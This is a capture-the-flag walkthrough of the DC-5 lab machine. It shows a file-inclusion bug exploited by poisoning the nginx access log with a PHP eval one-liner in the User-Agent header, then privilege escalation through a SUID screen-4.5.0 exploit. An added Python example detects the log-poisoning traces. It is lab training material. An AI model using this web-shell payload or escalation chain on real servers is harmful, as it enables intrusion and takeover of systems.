DC-5
1 Information gathering
First find the live hosts; once the IP is confirmed, scan all ports. NFS and HTTP services are open.
{"ip":"192.168.68.90","port":110,"service":"","Banner":"","url":""}
{"ip":"192.168.68.90","port":80,"service":"http","Banner":"","url":"http://192.168.68.90:80"}
{"ip":"192.168.68.90","port":111,"service":"","Banner":"","url":""}
{"ip":"192.168.68.90","port":58580,"service":"nfs","Banner":"","url":""}
{"ip":"192.168.68.90","port":25,"service":"","Banner":"","url":""}
{"url":"http://192.168.68.90:80","StatusCode":200,"Title":"Welcome","HeaderDigest":"server:nginx/1.6.2","Length":4025,"KeywordFinger":"","HashFinger":""}
Took a look at the web app: it only has a form-submission feature, but this version of nginx has the file-parsing vulnerability.
Also checked NFS: it is not registered, so it can't be used. That leaves the web.
2 A closer look at the web
Ran a directory scan; these few are the only results.
Opened Burp and clicked through every page while watching the requests. Stared at it for ages without finding an entry point, then on the page shown after the form submission I hit Ctrl+R a dozen or so times and noticed that the "Copyright © 2019" at the bottom of the page changes. The earlier scan had found footer.php, so capture the packets and compare.
The two requests have different timestamps, so my guess is that the year is generated from the current time.
In that case thankyou.php must be including footer.php, but that include is most likely hard-coded inside the PHP, <?php do_sth(); include("footer.php"); ?>, which doesn't look useful.
Peeked at the walkthrough; it feels like a bit of a leap. No normal business logic needs a file parameter to include footer.php, so it's a vulnerability left in on purpose...
Tried the PHP wrappers (pseudo-protocols); they don't work, only plain file inclusion (logs/session) works. The log records the User-Agent header, so it's better to put the one-liner in the UA (avoids encoding problems):
GET /xxx HTTP/1.1
Host: 192.168.68.90
User-Agent: <?php eval($_REQUEST[x]); ?>
Connect with AntSword (蚁剑). Web log location: /var/log/nginx/access.log
3 Privilege escalation
First get a reverse shell; AntSword's shell is too painful to use.
Check passwd: there are two usable accounts, dc and root, but I never found anything exploitable for dc afterwards.
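From the defender's side, the poisoning chain above leaves two traces in access.log: a User-Agent carrying a PHP open tag, and a request whose file parameter points at the log itself. The Python below is an added example, not part of the original writeup; it parses nginx combined-format lines (the sample lines are constructed for this example) and flags both traces, then correlates them per source IP.

```python
import re

# nginx "combined" log format (regex written for this example)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A PHP open tag has no business in a User-Agent string
PHP_TAG = re.compile(r'<\?(php\b|=)', re.IGNORECASE)
# A file= parameter aimed at logs, /proc, sessions, traversal or a wrapper
LFI_QUERY = re.compile(
    r'[?&]file=[^&\s]*(/var/log/|/proc/self/|session|\.\./|php://|data://|expect://)',
    re.IGNORECASE,
)

# Constructed sample lines: benign, UA poisoning, log include, normal include
SAMPLE_LOG = [
    '192.168.68.1 - - [10/Mar/2020:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 4025 "-" "Mozilla/5.0"',
    '192.168.68.1 - - [10/Mar/2020:10:00:05 +0000] "GET /xxx HTTP/1.1" 404 168 "-" "<?php eval($_REQUEST[x]); ?>"',
    '192.168.68.1 - - [10/Mar/2020:10:00:09 +0000] "GET /thankyou.php?file=/var/log/nginx/access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '192.168.68.1 - - [10/Mar/2020:10:00:12 +0000] "GET /thankyou.php?file=footer.php HTTP/1.1" 200 1000 "-" "Mozilla/5.0"',
]


def analyze(lines):
    """Return one finding per suspicious log line; unparsable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if PHP_TAG.search(m.group('ua')):
            findings.append({'ip': m.group('ip'), 'kind': 'ua_php_tag', 'request': m.group('request')})
        if LFI_QUERY.search(m.group('request')):
            findings.append({'ip': m.group('ip'), 'kind': 'lfi_log_include', 'request': m.group('request')})
    return findings


def poisoned_and_included(findings):
    """IPs that both wrote a PHP tag into the log and then included the log: high confidence."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f['ip'], set()).add(f['kind'])
    return sorted(ip for ip, kinds in by_ip.items() if {'ua_php_tag', 'lfi_log_include'} <= kinds)
```

Running analyze over the real access.log after the fact reconstructs the same two-step pattern the writeup used, which is why the file= parameter should be allowlisted to the footer it is meant to include.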
root:x:0:0:root:/root:/bin/bash
dc:x:1000:1000:dc,,,:/home/dc:/bin/bash
Ran LinEnum.sh. Nothing directly exploitable, but it lists the third-party tool screen (I've used it before; not as nice as tmux). I'd seen that this kind of software can have privilege escalation vulnerabilities, so I followed that lead.
[-] SUID files:
-rwsr-xr-x 1 root root 40168 May 18 2017 /bin/su
-rwsr-xr-x 1 root root 40000 Mar 30 2015 /bin/mount
-rwsr-xr-x 1 root root 27416 Mar 30 2015 /bin/umount
-rwsr-xr-x 1 root root 1441352 Apr 19 2019 /bin/screen-4.5.0
-rwsr-xr-x 1 root root 75376 May 18 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 89248 Nov 19 2017 /usr/bin/procmail
-rwsr-sr-x 1 daemon daemon 55424 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 54192 May 18 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 53616 May 18 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 39912 May 18 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44464 May 18 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 464904 Mar 25 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10104 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 1031296 Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 90456 Aug 13 2014 /sbin/mount.nfs
screen -list shows the session list is empty. Searched for "screen privilege escalation" and found an exploit exists; look it up directly with searchsploit.
Upload 41154.sh to the target machine and run it.
Got the flag.